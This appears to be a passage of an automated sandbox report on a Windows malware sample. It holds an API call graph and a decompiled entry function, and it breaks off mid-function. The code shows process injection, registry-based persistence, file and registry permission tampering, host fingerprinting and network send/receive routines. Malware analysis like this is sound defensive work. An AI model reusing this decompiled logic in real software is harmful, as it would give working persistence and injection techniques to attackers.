15515 40981e WriteProcessMemory 15514->15515 15515->15511 15516 40983b SetThreadContext 15515->15516 15516->15511 15517 409858 ResumeThread 15516->15517 15517->15508 15519 406386 15518->15519 15520 40638a GetModuleHandleA VirtualAlloc 15518->15520 15519->15514 15521 4063b6 15520->15521 15525 4063f5 15520->15525 15522 4063be VirtualAllocEx 15521->15522 15523 4063d6 15522->15523 15522->15525 15524 4063df WriteProcessMemory 15523->15524 15524->15525 15525->15514 15527 40dd41 InterlockedExchange 15526->15527 15528 40dd20 GetCurrentThreadId 15527->15528 15529 40dd4a 15527->15529 15530 40dd53 GetCurrentThreadId 15528->15530 15531 40dd2e GetTickCount 15528->15531 15529->15530 15530->15120 15531->15529 15532 40dd39 Sleep 15531->15532 15532->15527 15534 40dbf0 15533->15534 15566 40db67 GetEnvironmentVariableA 15534->15566 15536 40dc19 15537 40dcda 15536->15537 15538 40db67 3 API calls 15536->15538 15537->15122 15539 40dc5c 15538->15539 15539->15537 15540 40db67 3 API calls 15539->15540 15541 40dc9b 15540->15541 15541->15537 15542 40db67 3 API calls 15541->15542 15542->15537 15544 40db55 15543->15544 15545 40db3a 15543->15545 15544->15124 15544->15129 15570 40ebed 15545->15570 15579 40f04e SystemTimeToFileTime GetSystemTimeAsFileTime 15547->15579 15549 40e3be 15549->15124 15550 40e342 15550->15549 15582 40de24 15550->15582 15553 40e528 15552->15553 15554 40e3f4 15552->15554 15553->15132 15555 40e434 RegQueryValueExA 15554->15555 15556 40e458 15555->15556 15557 40e51d RegCloseKey 15555->15557 15558 40e46e RegQueryValueExA 15556->15558 15557->15553 15558->15556 15559 40e488 15558->15559 15559->15557 15560 40db2e 8 API calls 15559->15560 15561 40e499 15560->15561 15561->15557 15562 40e4b9 RegQueryValueExA 15561->15562 15563 40e4e8 15561->15563 15562->15561 15562->15563 15563->15557 15564 40e332 14 API calls 15563->15564 15565 40e513 15564->15565 15565->15557 15567 40dbca 15566->15567 15569 40db89 lstrcpyA CreateFileA 15566->15569 15567->15536 15569->15536 15571 40ec01 
15570->15571 15572 40ebf6 15570->15572 15573 40eba0 codecvt 2 API calls 15571->15573 15574 40ebcc 4 API calls 15572->15574 15575 40ec0a GetProcessHeap HeapReAlloc 15573->15575 15576 40ebfe 15574->15576 15577 40eb74 2 API calls 15575->15577 15576->15544 15578 40ec28 15577->15578 15578->15544 15593 40eb41 15579->15593 15583 40de3a 15582->15583 15586 40de4e 15583->15586 15597 40dd84 15583->15597 15586->15550 15587 40de9e 15587->15586 15589 40ebed 8 API calls 15587->15589 15588 40de76 15601 40ddcf 15588->15601 15591 40def6 15589->15591 15591->15586 15592 40ddcf lstrcmpA 15591->15592 15592->15586 15594 40eb54 15593->15594 15595 40eb4a 15593->15595 15594->15550 15596 40eae4 2 API calls 15595->15596 15596->15594 15598 40ddc5 15597->15598 15599 40dd96 15597->15599 15598->15587 15598->15588 15599->15598 15600 40ddad lstrcmpiA 15599->15600 15600->15598 15600->15599 15602 40dddd 15601->15602 15604 40de20 15601->15604 15603 40ddfa lstrcmpA 15602->15603 15602->15604 15603->15602 15604->15586 15606 40dd05 6 API calls 15605->15606 15607 40e821 15606->15607 15608 40dd84 lstrcmpiA 15607->15608 15609 40e82c 15608->15609 15610 40e844 15609->15610 15653 402480 15609->15653 15610->15149 15613 40dd05 6 API calls 15612->15613 15614 40df7c 15613->15614 15615 40dd84 lstrcmpiA 15614->15615 15619 40df89 15615->15619 15616 40dfc4 15616->15154 15617 40ddcf lstrcmpA 15617->15619 15618 40ec2e codecvt 4 API calls 15618->15619 15619->15616 15619->15617 15619->15618 15620 40dd84 lstrcmpiA 15619->15620 15620->15619 15622 40ea98 15621->15622 15662 40e8a1 15622->15662 15624 401e84 15624->15157 15626 4019d5 GetProcAddress GetProcAddress GetProcAddress 15625->15626 15629 4019ce 15625->15629 15627 401ab3 FreeLibrary 15626->15627 15628 401a04 15626->15628 15627->15629 15628->15627 15630 401a14 GetProcessHeap 15628->15630 15629->15162 15630->15629 15632 401a2e HeapAlloc 15630->15632 15632->15629 15633 401a42 15632->15633 15634 401a52 HeapReAlloc 15633->15634 15636 401a62 15633->15636 15634->15636 15635 
401aa1 FreeLibrary 15635->15629 15636->15635 15637 401a96 HeapFree 15636->15637 15637->15635 15690 401ac3 LoadLibraryA 15638->15690 15641 401bcf 15641->15173 15643 401ac3 12 API calls 15642->15643 15644 401c09 15643->15644 15645 401c41 15644->15645 15646 401c0d GetComputerNameA 15644->15646 15645->15181 15647 401c45 GetVolumeInformationA 15646->15647 15648 401c1f 15646->15648 15647->15645 15648->15645 15648->15647 15650 40ee2a 15649->15650 15651 4030d0 gethostname gethostbyname 15650->15651 15652 401f82 15651->15652 15652->15186 15652->15188 15656 402419 lstrlenA 15653->15656 15655 402491 15655->15610 15657 40243d lstrlenA 15656->15657 15660 402474 15656->15660 15658 402464 lstrlenA 15657->15658 15659 40244e lstrcmpiA 15657->15659 15658->15657 15658->15660 15659->15658 15661 40245c 15659->15661 15660->15655 15661->15658 15661->15660 15663 40dd05 6 API calls 15662->15663 15664 40e8b4 15663->15664 15665 40dd84 lstrcmpiA 15664->15665 15666 40e8c0 15665->15666 15667 40e90a 15666->15667 15668 40e8c8 lstrcpynA 15666->15668 15669 402419 4 API calls 15667->15669 15678 40ea27 15667->15678 15670 40e8f5 15668->15670 15671 40e926 lstrlenA lstrlenA 15669->15671 15683 40df4c 15670->15683 15673 40e96a 15671->15673 15674 40e94c lstrlenA 15671->15674 15677 40ebcc 4 API calls 15673->15677 15673->15678 15674->15673 15675 40e901 15676 40dd84 lstrcmpiA 15675->15676 15676->15667 15679 40e98f 15677->15679 15678->15624 15679->15678 15680 40df4c 20 API calls 15679->15680 15681 40ea1e 15680->15681 15682 40ec2e codecvt 4 API calls 15681->15682 15682->15678 15684 40dd05 6 API calls 15683->15684 15685 40df51 15684->15685 15686 40f04e 4 API calls 15685->15686 15687 40df58 15686->15687 15688 40de24 10 API calls 15687->15688 15689 40df63 15688->15689 15689->15675 15691 401ae2 GetProcAddress 15690->15691 15692 401b68 GetComputerNameA GetVolumeInformationA 15690->15692 15691->15692 15693 401af5 15691->15693 15692->15641 15694 40ebed 8 API calls 15693->15694 15695 401b29 15693->15695 15694->15693 
15695->15692 15695->15695 15696 40ec2e codecvt 4 API calls 15695->15696 15696->15692 15698 406ec3 2 API calls 15697->15698 15699 407ef4 15698->15699 15700 4073ff 17 API calls 15699->15700 15709 407fc9 15699->15709 15701 407f16 15700->15701 15701->15709 15710 407809 GetUserNameA 15701->15710 15703 407f63 15704 40ef1e lstrlenA 15703->15704 15703->15709 15705 407fa6 15704->15705 15706 40ef1e lstrlenA 15705->15706 15707 407fb7 15706->15707 15734 407a95 RegOpenKeyExA 15707->15734 15709->15196 15711 40783d LookupAccountNameA 15710->15711 15712 407a8d 15710->15712 15711->15712 15713 407874 GetLengthSid GetFileSecurityA 15711->15713 15712->15703 15713->15712 15714 4078a8 GetSecurityDescriptorOwner 15713->15714 15715 4078c5 EqualSid 15714->15715 15716 40791d GetSecurityDescriptorDacl 15714->15716 15715->15716 15717 4078dc LocalAlloc 15715->15717 15716->15712 15722 407941 15716->15722 15717->15716 15718 4078ef InitializeSecurityDescriptor 15717->15718 15720 407916 LocalFree 15718->15720 15721 4078fb SetSecurityDescriptorOwner 15718->15721 15719 40795b GetAce 15719->15722 15720->15716 15721->15720 15723 40790b SetFileSecurityA 15721->15723 15722->15712 15722->15719 15724 407980 EqualSid 15722->15724 15725 407a3d 15722->15725 15726 4079be EqualSid 15722->15726 15727 40799d DeleteAce 15722->15727 15723->15720 15724->15722 15725->15712 15728 407a43 LocalAlloc 15725->15728 15726->15722 15727->15722 15728->15712 15729 407a56 InitializeSecurityDescriptor 15728->15729 15730 407a62 SetSecurityDescriptorDacl 15729->15730 15731 407a86 LocalFree 15729->15731 15730->15731 15732 407a73 SetFileSecurityA 15730->15732 15731->15712 15732->15731 15733 407a83 15732->15733 15733->15731 15735 407ac4 15734->15735 15736 407acb GetUserNameA 15734->15736 15735->15709 15737 407da7 RegCloseKey 15736->15737 15738 407aed LookupAccountNameA 15736->15738 15737->15735 15738->15737 15739 407b24 RegGetKeySecurity 15738->15739 15739->15737 15740 407b49 GetSecurityDescriptorOwner 15739->15740 15741 407b63 
EqualSid 15740->15741 15742 407bb8 GetSecurityDescriptorDacl 15740->15742 15741->15742 15743 407b74 LocalAlloc 15741->15743 15744 407da6 15742->15744 15751 407bdc 15742->15751 15743->15742 15745 407b8a InitializeSecurityDescriptor 15743->15745 15744->15737 15747 407bb1 LocalFree 15745->15747 15748 407b96 SetSecurityDescriptorOwner 15745->15748 15746 407bf8 GetAce 15746->15751 15747->15742 15748->15747 15749 407ba6 RegSetKeySecurity 15748->15749 15749->15747 15750 407c1d EqualSid 15750->15751 15751->15744 15751->15746 15751->15750 15752 407cd9 15751->15752 15753 407c5f EqualSid 15751->15753 15754 407c3a DeleteAce 15751->15754 15752->15744 15755 407d5a LocalAlloc 15752->15755 15756 407cf2 RegOpenKeyExA 15752->15756 15753->15751 15754->15751 15755->15744 15757 407d70 InitializeSecurityDescriptor 15755->15757 15756->15755 15762 407d0f 15756->15762 15758 407d7c SetSecurityDescriptorDacl 15757->15758 15759 407d9f LocalFree 15757->15759 15758->15759 15760 407d8c RegSetKeySecurity 15758->15760 15759->15744 15760->15759 15761 407d9c 15760->15761 15761->15759 15763 407d43 RegSetValueExA 15762->15763 15763->15755 15764 407d54 15763->15764 15764->15755 15765->15216 15767 40dd05 6 API calls 15766->15767 15770 40e65f 15767->15770 15768 40e6a5 15769 40ebcc 4 API calls 15768->15769 15775 40e6f5 15768->15775 15772 40e6b0 15769->15772 15770->15768 15771 40e68c lstrcmpA 15770->15771 15771->15770 15773 40e6b7 15772->15773 15774 40e6e0 lstrcpynA 15772->15774 15772->15775 15773->15218 15774->15775 15775->15773 15776 40e71d lstrcmpA 15775->15776 15776->15775 15777->15224 15779 40c525 15778->15779 15780 40c532 15778->15780 15779->15780 15782 40ec2e codecvt 4 API calls 15779->15782 15781 40c548 15780->15781 15930 40e7ff 15780->15930 15784 40e7ff lstrcmpiA 15781->15784 15792 40c54f 15781->15792 15782->15780 15785 40c615 15784->15785 15786 40ebcc 4 API calls 15785->15786 15785->15792 15786->15792 15787 40c5d1 15790 40ebcc 4 API calls 15787->15790 15789 40e819 11 API calls 15791 40c5b7 
15789->15791 15790->15792 15793 40f04e 4 API calls 15791->15793 15792->15237 15794 40c5bf 15793->15794 15794->15781 15794->15787 15796 402692 inet_addr 15795->15796 15797 40268e 15795->15797 15796->15797 15798 40269e gethostbyname 15796->15798 15799 40f428 15797->15799 15798->15797 15933 40f315 15799->15933 15804 40c8d2 15802->15804 15803 40c907 15803->15239 15804->15803 15805 40c517 23 API calls 15804->15805 15805->15803 15806 40f43e 15807 40f473 recv 15806->15807 15808 40f458 15807->15808 15809 40f47c 15807->15809 15808->15807 15808->15809 15809->15255 15811 40c670 15810->15811 15812 40c67d 15810->15812 15813 40ebcc 4 API calls 15811->15813 15814 40ebcc 4 API calls 15812->15814 15816 40c699 15812->15816 15813->15812 15814->15816 15815 40c6f3 15815->15268 15815->15297 15816->15815 15817 40c73c send 15816->15817 15817->15815 15819 40c770 15818->15819 15820 40c77d 15818->15820 15821 40ebcc 4 API calls 15819->15821 15822 40c799 15820->15822 15823 40ebcc 4 API calls 15820->15823 15821->15820 15824 40c7b5 15822->15824 15826 40ebcc 4 API calls 15822->15826 15823->15822 15825 40f43e recv 15824->15825 15827 40c7cb 15825->15827 15826->15824 15828 40f43e recv 15827->15828 15829 40c7d3 15827->15829 15828->15829 15829->15297 15946 407db7 15830->15946 15833 407e70 15835 407e96 15833->15835 15837 40f04e 4 API calls 15833->15837 15834 40f04e 4 API calls 15836 407e4c 15834->15836 15835->15297 15836->15833 15838 40f04e 4 API calls 15836->15838 15837->15835 15838->15833 15840 406ec3 2 API calls 15839->15840 15841 407fdd 15840->15841 15842 4080c2 CreateProcessA 15841->15842 15843 4073ff 17 API calls 15841->15843 15842->15320 15842->15321 15844 407fff 15843->15844 15844->15842 15845 407809 21 API calls 15844->15845 15846 40804d 15845->15846 15846->15842 15847 40ef1e lstrlenA 15846->15847 15848 40809e 15847->15848 15849 40ef1e lstrlenA 15848->15849 15850 4080af 15849->15850 15851 407a95 24 API calls 15850->15851 15851->15842 15853 407db7 2 API calls 15852->15853 15854 407eb8 
15853->15854 15855 40f04e 4 API calls 15854->15855 15856 407ece DeleteFileA 15855->15856 15856->15297 15858 40dd05 6 API calls 15857->15858 15859 40e31d 15858->15859 15950 40e177 15859->15950 15861 40e326 15861->15293 15863 4031f3 15862->15863 15873 4031ec 15862->15873 15864 40ebcc 4 API calls 15863->15864 15878 4031fc 15864->15878 15865 40344b 15866 403459 15865->15866 15867 40349d 15865->15867 15869 40f04e 4 API calls 15866->15869 15868 40ec2e codecvt 4 API calls 15867->15868 15868->15873 15870 40345f 15869->15870 15871 4030fa 4 API calls 15870->15871 15871->15873 15872 40ebcc GetProcessHeap HeapSize GetProcessHeap RtlAllocateHeap 15872->15878 15873->15297 15874 40344d 15875 40ec2e codecvt 4 API calls 15874->15875 15875->15865 15877 403141 lstrcmpiA 15877->15878 15878->15865 15878->15872 15878->15873 15878->15874 15878->15877 15976 4030fa GetTickCount 15878->15976 15880 4030fa 4 API calls 15879->15880 15881 403c1a 15880->15881 15885 403ce6 15881->15885 15981 403a72 15881->15981 15884 403a72 9 API calls 15888 403c5e 15884->15888 15885->15297 15886 403a72 9 API calls 15886->15888 15887 40ec2e GetProcessHeap HeapSize GetProcessHeap HeapFree codecvt 15887->15888 15888->15885 15888->15886 15888->15887 15890 403a10 15889->15890 15891 4030fa 4 API calls 15890->15891 15892 403a1a 15891->15892 15892->15297 15894 40dd05 6 API calls 15893->15894 15895 40e7be 15894->15895 15895->15297 15897 40c105 15896->15897 15898 40c07e wsprintfA 15896->15898 15897->15297 15990 40bfce GetTickCount wsprintfA 15898->15990 15900 40c0ef 15991 40bfce GetTickCount wsprintfA 15900->15991 15903 407047 15902->15903 15904 406f88 LookupAccountNameA 15902->15904 15903->15297 15906 407025 15904->15906 15907 406fcb 15904->15907 15908 406edd 5 API calls 15906->15908 15910 406fdb ConvertSidToStringSidA 15907->15910 15909 40702a wsprintfA 15908->15909 15909->15903 15910->15906 15911 406ff1 15910->15911 15912 407013 LocalFree 15911->15912 15912->15906 15914 40dd05 6 API calls 15913->15914 15915 40e85c 
15914->15915 15916 40dd84 lstrcmpiA 15915->15916 15917 40e867 15916->15917 15918 40e885 lstrcpyA 15917->15918 15992 4024a5 15917->15992 15995 40dd69 15918->15995 15924 407db7 2 API calls 15923->15924 15925 407de1 15924->15925 15926 40f04e 4 API calls 15925->15926 15929 407e16 15925->15929 15927 407df2 15926->15927 15928 40f04e 4 API calls 15927->15928 15927->15929 15928->15929 15929->15297 15931 40dd84 lstrcmpiA 15930->15931 15932 40c58e 15931->15932 15932->15781 15932->15787 15932->15789 15934 40f33b 15933->15934 15941 40ca1d 15933->15941 15935 40f347 htons socket 15934->15935 15936 40f382 ioctlsocket 15935->15936 15937 40f374 closesocket 15935->15937 15938 40f3aa connect select 15936->15938 15939 40f39d 15936->15939 15937->15941 15938->15941 15942 40f3f2 __WSAFDIsSet 15938->15942 15940 40f39f closesocket 15939->15940 15940->15941 15941->15252 15941->15806 15942->15940 15943 40f403 ioctlsocket 15942->15943 15945 40f26d setsockopt setsockopt setsockopt setsockopt setsockopt 15943->15945 15945->15941 15947 407dc8 InterlockedExchange 15946->15947 15948 407dc0 Sleep 15947->15948 15949 407dd4 15947->15949 15948->15947 15949->15833 15949->15834 15951 40e184 15950->15951 15952 40e2e4 15951->15952 15953 40e223 15951->15953 15966 40dfe2 15951->15966 15952->15861 15953->15952 15955 40dfe2 8 API calls 15953->15955 15959 40e23c 15955->15959 15956 40e1be 15956->15953 15957 40dbcf 3 API calls 15956->15957 15960 40e1d6 15957->15960 15958 40e21a CloseHandle 15958->15953 15959->15952 15970 40e095 RegCreateKeyExA 15959->15970 15960->15953 15960->15958 15961 40e1f9 WriteFile 15960->15961 15961->15958 15962 40e213 15961->15962 15962->15958 15964 40e2a3 15964->15952 15965 40e095 4 API calls 15964->15965 15965->15952 15967 40dffc 15966->15967 15969 40e024 15966->15969 15968 40db2e 8 API calls 15967->15968 15967->15969 15968->15969 15969->15956 15971 40e172 15970->15971 15974 40e0c0 15970->15974 15971->15964 15972 40e14e RegDeleteValueA RegCloseKey 15972->15971 15973 40e115 
RegSetValueExA 15973->15974 15975 40e13d 15973->15975 15974->15973 15974->15975 15975->15972 15977 403122 InterlockedExchange 15976->15977 15978 40312e 15977->15978 15979 40310f GetTickCount 15977->15979 15978->15878 15979->15978 15980 40311a Sleep 15979->15980 15980->15977 15982 40f04e 4 API calls 15981->15982 15989 403a83 15982->15989 15983 403ac1 15983->15884 15983->15885 15984 403be6 15985 40ec2e codecvt 4 API calls 15984->15985 15985->15983 15986 403bc0 15986->15984 15988 40ec2e GetProcessHeap HeapSize GetProcessHeap HeapFree codecvt 15986->15988 15987 403b66 lstrlenA 15987->15983 15987->15989 15988->15986 15989->15983 15989->15986 15989->15987 15990->15900 15991->15897 15993 402419 4 API calls 15992->15993 15994 4024b6 15993->15994 15994->15918 15996 40dd79 lstrlenA 15995->15996 15996->15297 14811 7b96fc 14814 7b9704 14811->14814 14815 7b9713 14814->14815 14818 7b9ea4 14815->14818 14819 7b9ebf 14818->14819 14820 7b9ec8 CreateToolhelp32Snapshot 14819->14820 14821 7b9ee4 Module32First 14819->14821 14820->14819 14820->14821 14822 7b9703 14821->14822 14823 7b9ef3 14821->14823 14825 7b9b63 14823->14825 14826 7b9b8e 14825->14826 14827 7b9b9f VirtualAlloc 14826->14827 14828 7b9bd7 14826->14828 14827->14828
C-Code - Quality: 89%
_entry_(CHAR* _a12, void* _a15) {
	char _v8;
	char _v12;
	intOrPtr _v16;
	char _v20;
	void* _v24;
	char _v28;
	char _v32;
	union _GET_FILEEX_INFO_LEVELS _v36;
	CHAR* _v40;
	char _v44;
	char _v48;
	struct _PROCESS_INFORMATION _v64;
	char _v80;
	char _v112;
	char _v371;
	char _v372;
	char _v671;
	char _v672;
	char _v704;
	struct _STARTUPINFOA _v772;
	char _v1271;
	char _v1272;
	char _v1672;
	char _t238;
	long _t239;
	char _t242;
	long _t244;
	CHAR* _t248;
	char _t250;
	intOrPtr _t257;
	char _t267;
	intOrPtr* _t272;
	char _t276;
	char _t279;
	char _t282;
	char _t283;
	void* _t284;
	char _t294;
	CHAR* _t303;
	int _t304;
	char _t309;
	CHAR* _t312;
	char _t318;
	int _t324;
	CHAR* _t325;
	char _t328;
	char* _t331;
	char _t332;
	char _t340;
	char _t344;
	CHAR* _t357;
	CHAR* _t358;
	int _t359;
	int _t373;
	long _t379;
	void* _t383;
	void* _t396;
	void* _t401;
	char _t402;
	char _t403;
	intOrPtr* _t410;
	void* _t411;
	char _t417;
	char _t418;
	void* _t424;
	intOrPtr _t426;
	void* _t428;
	char* _t436;
	intOrPtr _t441;
	CHAR* _t442;
	void* _t450;
	void* _t451;
	char _t459;
	void* _t464;
	void* _t465;
	void* _t467;
	void* _t468;
	void* _t469;
	void* _t470;
	void* _t471;
	void* _t474;
	intOrPtr _t475;

	SetErrorMode(3); // executed
	SetErrorMode(3); // executed
	SetUnhandledExceptionFilter(E00406511); // executed
	E0040EC54(); // executed
	_t475 =  *0x41201f; // 0x0
	if(_t475 != 0) {
		__eflags =  *0x4133d8;
		if(__eflags == 0) {
			L126:
			CreateThread(0, 0, E0040405E, 0, 0, 0);
			__imp__#115(0x1010,  &_v1672);
			E0040E52E(_t449, __eflags);
			E0040EAAF(1, 0);
			E00401D96(_t438, 0x412118);
			E004080C9(_t438);
			CreateThread(0, 0, E0040877E, 0, 0, 0);
			E00405E6C(__eflags);
			E00403132();
			E0040C125(__eflags);
			E00408DB1(_t438);
			Sleep(0xbb8);
			E0040C4EE();
			while(1) {
				__eflags =  *0x4133d0;
				if( *0x4133d0 == 0) {
					goto L129;
				}
				_t239 = GetTickCount();
				__eflags = _t239 -  *0x4133d0 - 0x109a0;
				if(_t239 -  *0x4133d0 < 0x109a0) {
					L131:
					Sleep(0x1a90);
					continue;
				}
				L129:
				_t238 = E0040C913();
				__eflags = _t238;
				if(_t238 == 0) {
					 *0x4133d0 = GetTickCount();
				}
				goto L131;
			}
		}
		_a12 = 0xa;
		while(1) {
			_t242 = DeleteFileA(0x4133d8);
			__eflags = _t242;
			if(_t242 != 0) {
				break;
			}
			__eflags = _a12;
			if(_a12 <= 0) {
				break;
			}
			_t244 = GetLastError();
			__eflags = _t244 - 2;
			if(_t244 == 2) {
				break;
			}
			_t219 =  &_a12;
			 *_t219 = _a12 - 1;
			__eflags =  *_t219;
			Sleep(0x3e8);
		}
		E0040EE2A(_t438, 0x4133d8, 0, 0x104);
		_t465 = _t465 + 0xc;
		goto L126;
	} else {
		_v12 = 0;
		if(GetModuleFileNameA(GetModuleHandleA(0),  &_v672, 0x12c) == 0) {
			_v672 = 0;
		}
		if(_v672 == 0x22) {
			E0040EF00( &_v672,  &_v671);
			_t436 = E0040ED23( &_v672, 0x22);
			_t465 = _t465 + 0x10;
			if(_t436 != 0) {
				 *_t436 = 0;
			}
		}
		_t248 = GetCommandLineA();
		_t459 = 0x4122f8;
		_a12 = _t248;
		_t250 = E0040EE95(_a12, E00402544(0x4122f8, 0x410a48, 4, 0xe4, 0xc8));
		_t454 = 0x100;
		_v8 = _t250;
		E0040EE2A(_t438, 0x4122f8, 0, 0x100);
		_t467 = _t465 + 0x28;
		if(_v8 == 0) {
			_t257 = E004096AA( &_v672,  &_v48,  &_v44,  &_v372,  &_v112); // executed
			_t467 = _t467 + 0x14;
			_v16 = _t257;
			if(_t257 == 0) {
				E0040EF00(0x4121a8,  &_v672);
				_pop(_t438);
				_a12 = GetCommandLineA();
				_v8 = E0040EE95(_a12, E00402544(0x4122f8, 0x410a38, 4, 0xe4, 0xc8));
				E0040EE2A(_t438, 0x4122f8, 0, 0x100);
				_t468 = _t467 + 0x28;
				__eflags = _v8;
				if(_v8 == 0) {
					L102:
					_v8 = E0040EE95(_a12, E00402544(_t459, 0x410a28, 4, 0xe4, 0xc8));
					E0040EE2A(_t438, _t459, 0, _t454);
					_t467 = _t468 + 0x28;
					__eflags = _v8;
					if(_v8 == 0) {
						L110:
						_t267 = E00406EC3();
						__eflags = _t267;
						if(_t267 != 0) {
							E004098F2(_t438);
							L19:
							ExitProcess(0); // executed
						}
						__eflags = _v372;
						if(_v372 == 0) {
							L116:
							 *0x4133b0 = 0;
							L117:
							_v64.hProcess =  &_v372;
							_v64.hThread = E00409961;
							_v64.dwProcessId = 0;
							_v64.dwThreadId = 0;
							StartServiceCtrlDispatcherA( &_v64);
							goto L19;
						}
						_t272 =  &_v372;
						_t449 = _t272 + 1;
						do {
							_t438 =  *_t272;
							_t272 = _t272 + 1;
							__eflags = _t438;
						} while (_t438 != 0);
						__eflags = _t272 - _t449 - 0x20;
						if(_t272 - _t449 >= 0x20) {
							goto L116;
						}
						E0040EF00(0x4133b0,  &_v372);
						_pop(_t438);
						goto L117;
					}
					_t459 = _v8 + 3;
					_t276 = E0040ED03(_t459, 0x20);
					_pop(_t438);
					__eflags = _t276;
					if(_t276 != 0) {
						L107:
						_t454 = _t276 - _t459;
						__eflags = _t454 - 0x20;
						if(_t454 >= 0x20) {
							_t454 = 0x1f;
						}
						E0040EE08(0x412184, _t459, _t454);
						_t467 = _t467 + 0xc;
						 *((char*)(_t454 + 0x412184)) = 0;
						goto L110;
					}
					_t279 = _t459;
					_t449 = _t279 + 1;
					do {
						_t438 =  *_t279;
						_t279 = _t279 + 1;
						__eflags = _t438;
					} while (_t438 != 0);
					_t276 = _t279 - _t449 + _t459;
					__eflags = _t276;
					goto L107;
				}
				_t282 = _v8 + 3;
				_v672 = 0;
				__eflags =  *_t282 - 0x22;
				_v20 = _t282;
				if( *_t282 != 0x22) {
					_t283 = E0040ED03(_v20, 0x20);
					_pop(_t438);
					__eflags = _t283;
					if(_t283 == 0) {
						_t283 =  &(_a12[lstrlenA(_a12)]);
						__eflags = _t283;
					}
					_t284 = _t283 - _v8;
					_v24 = _t284;
					__eflags = _t284 + 0xfffffffd;
					E0040EE08( &_v672, _v20, _t284 + 0xfffffffd);
					 *((char*)(_t464 + _v24 - 0x29f)) = 0;
					L98:
					_t468 = _t468 + 0xc;
					L99:
					__eflags = _v672;
					if(_v672 != 0) {
						E0040EE08(0x4133d8,  &_v672, 0x103);
						_t468 = _t468 + 0xc;
					}
					 *0x412cc0 = 1;
					goto L102;
				}
				_v20 = _v8 + 4;
				_t294 = E0040ED03(_v8 + 4, 0x22);
				_pop(_t438);
				__eflags = _t294;
				if(_t294 == 0) {
					goto L99;
				}
				_v24 = _t294 - _v8;
				E0040EE08( &_v672, _v20, _t294 - _v8 + 0xfffffffc);
				 *((char*)(_t464 + _v24 - 0x2a0)) = 0;
				goto L98;
			}
			_v36 = 0;
			if(_t257 >= 4 || _v48 > 0x61 && _v44 != 0) {
				L84:
				if(GetModuleFileNameA(GetModuleHandleA(0),  &_v672, 0x12c) != 0) {
					_t303 =  &_v672;
					if(_v672 == 0x22) {
						_t303 =  &_v671;
					}
					if(_t303[1] == 0x3a && _t303[2] == 0x5c) {
						_t303[3] = 0;
						_t304 = GetDriveTypeA(_t303);
						_t515 = _t304 - 2;
						if(_t304 != 2) {
							E00409145(_t515);
							_t438 = 1;
						}
					}
				}
				goto L19;
			} else {
				E00404280(_t438, 1); // executed
				_pop(_t438);
				if(_v672 == 0) {
					goto L84;
				}
				_t309 = E0040675C( &_v672,  &_v12, 0); // executed
				_t467 = _t467 + 0xc;
				_v8 = _t309;
				if(_t309 == 0 || _v12 == 0) {
					goto L84;
				} else {
					_v32 = 0;
					_v28 = 0;
					if(_v16 == 2) {
                                                                                									L55:
                                                                                									__eflags = _v16 - 3;
                                                                                									if(_v16 >= 3) {
                                                                                										L83:
                                                                                										E0040EC2E(_v8);
                                                                                										_pop(_t438);
                                                                                										if(_v36 != 0) {
                                                                                											goto L19;
                                                                                										}
                                                                                										goto L84;
                                                                                									}
                                                                                									_t312 = E00402544(_t459, 0x410a3c, 0xc, 0xe4, 0xc8);
                                                                                									_t469 = _t467 + 0x14;
                                                                                									__eflags = GetEnvironmentVariableA(_t312,  &_v1272, 0x1f4);
                                                                                									if(__eflags == 0) {
                                                                                										L82:
                                                                                										E0040EE2A(_t438, _t459, 0, _t454);
                                                                                										_t467 = _t469 + 0xc;
                                                                                										goto L83;
                                                                                									}
                                                                                									_t318 = E004099D2(_t449, __eflags,  &_v1272,  &_v672,  &_v704, _v8, _v12);
                                                                                									_t469 = _t469 + 0x14;
                                                                                									__eflags = _t318;
                                                                                									if(_t318 == 0) {
                                                                                										goto L82;
                                                                                									}
                                                                                									E0040EE2A(_t438, _t459, 0, _t454);
                                                                                									_t470 = _t469 + 0xc;
                                                                                									_v1272 = 0x22;
                                                                                									lstrcpyA( &_v1271,  &_v672);
                                                                                									_t324 = lstrlenA( &_v1272);
                                                                                									 *((char*)(_t464 + _t324 - 0x4f4)) = 0x22;
                                                                                									_t325 = _t324 + 1;
                                                                                									__eflags = _v16 - 2;
                                                                                									_a12 = _t325;
                                                                                									 *((char*)(_t464 + _t325 - 0x4f4)) = 0;
                                                                                									if(_v16 != 2) {
                                                                                										L60:
                                                                                										_push(0);
                                                                                										_push( &_v112);
                                                                                										_t328 = E00406DC2(_t438) ^ 0x61616161;
                                                                                										__eflags = _t328;
                                                                                										_push(_t328);
                                                                                										E0040F133();
                                                                                										_t470 = _t470 + 0xc;
                                                                                										L61:
                                                                                										_t331 = E00402544(_t459,  &E004106AC, 0x2e, 0xe4, 0xc8);
                                                                                										_t471 = _t470 + 0x14;
                                                                                										_t332 = RegOpenKeyExA(0x80000001, _t331, 0, 0x103,  &_v24);
                                                                                										_v20 = _t332;
                                                                                										__eflags = _t332;
                                                                                										if(_t332 == 0) {
                                                                                											_t373 =  &(_a12[1]);
                                                                                											__eflags = _t373;
                                                                                											_v20 = RegSetValueExA(_v24,  &_v112, 0, 1,  &_v1272, _t373);
                                                                                											RegCloseKey(_v24);
                                                                                										}
                                                                                										E0040EE2A(_t438, _t459, 0, _t454);
                                                                                										E0040EE2A(_t438,  &_v772, 0, 0x44);
                                                                                										_v772.cb = 0x44;
                                                                                										E0040EE2A(_t438,  &_v64, 0, 0x10);
                                                                                										_t469 = _t471 + 0x24;
                                                                                										_t340 = GetModuleFileNameA(GetModuleHandleA(0),  &_v372, 0x104);
                                                                                										__eflags = _t340;
                                                                                										if(_t340 != 0) {
                                                                                											__eflags = _v372 - 0x22;
                                                                                											_t357 =  &_v372;
                                                                                											_v40 = _t357;
                                                                                											if(_v372 == 0x22) {
                                                                                												_t357 =  &_v371;
                                                                                												_v40 = _t357;
                                                                                											}
                                                                                											__eflags =  *((char*)(_t357 + 1)) - 0x3a;
                                                                                											if( *((char*)(_t357 + 1)) == 0x3a) {
                                                                                												__eflags =  *((char*)(_t357 + 2)) - 0x5c;
                                                                                												if( *((char*)(_t357 + 2)) == 0x5c) {
                                                                                													_t358 = _v40;
                                                                                													_t438 = _t358[3];
                                                                                													_a15 = _t358[3];
                                                                                													_t358[3] = 0;
                                                                                													_t359 = GetDriveTypeA(_t358);
                                                                                													__eflags = _t359 - 2;
                                                                                													if(_t359 != 2) {
                                                                                														_t438 = _v40;
                                                                                														_v40[3] = _a15;
                                                                                														lstrcatA( &_v1272, E00402544(_t459, 0x410a38, 4, 0xe4, 0xc8));
                                                                                														E0040EE2A(_v40, _t459, 0, _t454);
                                                                                														_t469 = _t469 + 0x20;
